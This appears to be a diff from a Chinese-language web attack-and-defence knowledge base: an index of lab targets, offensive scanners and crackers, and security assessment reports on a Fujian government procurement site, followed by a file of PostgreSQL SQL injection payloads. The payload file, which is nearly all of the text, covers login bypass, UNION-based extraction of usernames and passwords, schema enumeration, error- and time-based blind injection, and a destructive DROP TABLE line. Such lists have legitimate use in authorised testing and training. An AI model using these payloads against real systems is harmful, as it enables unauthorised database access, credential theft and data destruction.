初始化: Web安全攻防知识库

- 靶场环境: DVWA/WebGoat/Pikachu/BWAPP/SQLi-Labs/XSS-Labs
- SQL注入工具: sqli-scanner.py, blind-sqli.py, sqli-exploit.go
- XSS工具: xss-fuzzer.py, xss-scanner.go
- 认证攻击: web-brute.py, jwt-cracker.py
- 服务端安全: port-scanner.py, tls-scanner.py
- 防御配置: nginx-hardening.conf
- 案例研究: 福建政采网安全评估报告 (13份)
- 同步脚本: sync-gitea.sh

01-sql-injection/payloads/postgres.txt

@@ -0,0 +1,27 @@
+' OR '1'='1
+' OR '1'='1'-- -
+' OR 1=1--
+1' OR '1'='1
+admin'--
+' AND 1=1--
+' UNION SELECT NULL--
+' UNION SELECT 1,2,3--
+' UNION SELECT username,password,3 FROM users--
+'; DROP TABLE users--
+' AND pg_sleep(5)--
+' AND pg_sleep(5)-- -
+'; SELECT pg_sleep(5)--
+' UNION SELECT NULL,version(),NULL--
+' UNION SELECT NULL,current_database(),NULL--
+' UNION SELECT NULL,current_user,NULL--
+' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
+' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--
+' AND 1=CAST((SELECT version()) AS INT)--
+' AND 1=CAST((SELECT current_database()) AS INT)--
+' UNION SELECT NULL,string_agg(column_name,','),NULL FROM information_schema.columns WHERE table_name='users'--
+1 AND 1=1
+1 AND 1=2
+1 OR 1=1
+') OR ('1'='1
+') AND 1=1--
+') AND 1=2--